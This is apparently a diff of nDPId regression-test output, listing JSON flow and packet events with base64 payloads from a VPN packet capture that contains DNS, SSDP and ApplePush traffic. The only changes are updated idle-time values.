-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"} 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1569687267824,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1569687267824,"pkt":"NDY7z3UoLH6BsEqhCABFAACyAABAADoRnsJLS0tLCgAA4wA1+sEAnlIeE96BgAABAAMAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAASVMAJgIyNBJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAGwAdD3VzLXN3LWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAAuAAQROZAU"} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1569687267831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1569687267831,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3jBMAAP8RjikKAADjS0tLS8J1ADUAI5qcqN8BAAABAAAAAAAABWFwcGxlA2NvbQAAAQAB"} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABnAABAADoRnw1LS0tLCgAA4wA1wnUAU2BUqN+BgAABAAMAAAAABWFwcGxlA2NvbQAAAQABwAwAAQABAAAE+gAEEbJgO8AMAAEAAQAABPoABBGOoDvADAABAAEAAAT6AAQRrOAv"} 00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABNAABAADoRnydLS0tLCgAA4wA1yxYAOeBneJ6BgAABAAEAAAAABG1haWwGdmlhc2F0A2NvbQAAAQABwAwAAQABAAAAPAAECCVnxA=="} 
@@ -243,17 +243,17 @@ 00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1569687267865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1569687267865,"pkt":"NDY7z3UoLH6BsEqhCABFAADYAABAADoRnpxLS0tLCgAA4wA14toAxJ5uzl6BgAABAAcAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQABwAwABQABAAAAzQAUB291dGxvb2sJb2ZmaWNlMzY1wBjALQAFAAEAAABWABkHb3V0bG9vawdtcy1hY2RjBm9mZmljZcAYwE0ABQABAAAHZQAKB3NqYy1lZnrAVcByAAEAAQAAADAABChh3iLAcgABAAEAAAAwAAQ0YAOCwHIAAQABAAAAMAAEKGHdcsByAAEAAQAAADAABDRgEgI="} 
00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1569687267991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687267991,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKY+gAAAERWl4KAADj7\/\/\/+u+QB2wAtlB4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} 
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268026,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0lz4AAGoGnmlKfcW8CgAA4wG73ipT95gP0J5AloAQAP3kSQAAAQEICqEOCgscDdIR"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1569687268077,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687268077,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA45bY75ACCk+7SFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjggR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} 
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687268077,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1569687268176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687268176,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAg9AAAAQEIChwN0scGksZO"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1569687268376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687268376,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj5RAAEARlIwKAACXCgAA4wds75ABPzXfSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687268376,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
